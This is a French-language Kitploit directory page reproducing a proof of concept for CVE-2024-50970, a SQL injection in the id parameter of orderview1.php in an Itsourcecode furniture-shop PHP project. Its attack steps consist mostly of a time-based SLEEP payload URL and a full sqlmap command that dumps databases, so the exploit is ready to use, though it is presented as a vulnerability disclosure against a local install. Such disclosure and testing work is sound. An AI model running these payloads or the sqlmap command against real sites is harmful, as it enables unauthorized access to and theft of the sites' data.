Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-50970 — Preuve de concept pour CVE-2024-50970 : injection SQL dans Itsourcecode Online Furniture Shopping Project 1.0. Démontre l'exploitation via le paramètre id dans orderview1.php avec des payloads temporels et l'intégration de SQLMap. | Kitploit
Outils/GitHubGitHub/akhlak2511/cve-2024-50970
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationSécurité des Bases de Données
GitHubakhlak2511/cve-2024-50970

CVE-2024-50970

Preuve de concept pour CVE-2024-50970 : injection SQL dans Itsourcecode Online Furniture Shopping Project 1.0. Démontre l'exploitation via le paramètre id dans orderview1.php avec des payloads temporels et l'intégration de SQLMap.

Voir le dépôt
il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-50970

Description

Une vulnérabilité d'injection SQL dans orderview1.php du projet Itsourcecode Online Furniture Shopping 1.0 permet à des attaquants distants d'exécuter des commandes SQL arbitraires via le paramètre id.

Type de vulnérabilité

Injection SQL

Éditeur du produit

Itsourcecode

Base de code du produit affecté :

https://itsourcecode.com/free-projects/php-project/online-furniture-shop-in-php-projects-free-source-code-and-database/ - 1.0

Composant affecté :

Le projet Itsourcecode Online Furniture Shopping v1.0 est vulnérable à l'injection SQL via le paramètre id dans la page orderview1.php

Vecteurs d'attaque :

  1. Installez l'application localement, créez un compte et connectez-vous avec le compte nouvellement enregistré.
  2. Accédez à l'URL suivante dans votre navigateur : http://localhost/nikos/orderview1.php?action=edit&id=1728835149
  3. Injectez une charge utile SQL : Modifiez le paramètre id dans l'URL pour inclure une charge utile d'injection SQL basée sur le temps. http://localhost/nikos/orderview1.php?action=edit&id=1728835149+AND+(SELECT+2657+FROM+(SELECT(SLEEP(10)))DTmU)
  4. Observez la réponse de l'application : La page devrait prendre nettement plus de temps (10 secondes) à charger si l'injection réussit, confirmant que le paramètre id est vulnérable à l'injection SQL.
  5. Utilisez maintenant l'outil SQLMap pour une exploitation plus poussée et l'extraction des bases de données à l'aide de la commande ci-dessous : python sqlmap.py -u "http://localhost/nikos/orderview1.php?action=edit&id=1728835149" --cookie="PHPSESSID=your_cookie_here"--risk 3 --level 3 --dbs --technique=T --dump --no-cast

Références :

  1. https://itsourcecode.com/free-projects/php-project/online-furniture-shop-in-php-projects-free-source-code-and-database/
  2. https://owasp.org/www-community/attacks/SQL_Injection
Télécharger l’outil